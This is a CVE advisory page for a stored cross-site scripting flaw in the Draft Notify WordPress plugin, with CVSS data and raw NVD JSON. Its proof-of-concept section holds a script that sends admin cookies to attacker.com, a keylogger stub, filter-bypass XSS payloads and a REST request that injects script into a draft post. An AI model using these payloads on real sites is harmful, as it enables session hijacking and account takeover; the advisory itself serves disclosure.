Security Vulnerability Report
中文
CVE-2025-67627 CVSS 5.9 MEDIUM

CVE-2025-67627

Published: 2025-12-24 13:16:19
Last Modified: 2026-04-27 18:16:47

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in TouchOfTech Draft Notify draft-notify allows Stored XSS.This issue affects Draft Notify: from n/a through <= 1.5.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Draft Notify <= 1.5 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Stored XSS PoC for Draft Notify Plugin CVE-2025-67627 --> <!-- Attack Scenario: Inject malicious JavaScript into WordPress draft post --> <!-- Step 1: Create a new draft post with XSS payload in title --> <!-- Payload can be placed in post title, content, or excerpt --> <script> // Steal admin cookies/session var cookies = document.cookie; var xhr = new XMLHttpRequest(); xhr.open('POST', 'https://attacker.com/steal', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.send('cookie=' + encodeURIComponent(cookies)); // Alternative: Keylogger document.addEventListener('keypress', function(e) { console.log(String.fromCharCode(e.which)); }); </script> <!-- Simpler XSS test payload --> <img src=x onerror="alert('XSS Triggered - CVE-2025-67627')"> <!-- Filter bypass techniques --> <svg/onload=alert(document.domain)> <body onload=alert('XSS')> <details open ontoggle=alert(1)> <!-- POST request to create draft via WordPress REST API --> <!-- POST /wp-json/wp/v2/posts HTTP/1.1 Host: target.com Content-Type: application/json Cookie: [admin cookies] Authorization: Bearer [token] { "title": "Draft Title <script>alert('XSS')</script>", "status": "draft", "content": "Post content with XSS payload" } -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67627", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:18.823", "lastModified": "2026-04-27T18:16:47.043", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in TouchOfTech Draft Notify draft-notify allows Stored XSS.This issue affects Draft Notify: from n/a through <= 1.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.7, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/draft-notify/vulnerability/wordpress-draft-notify-plugin-1-5-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}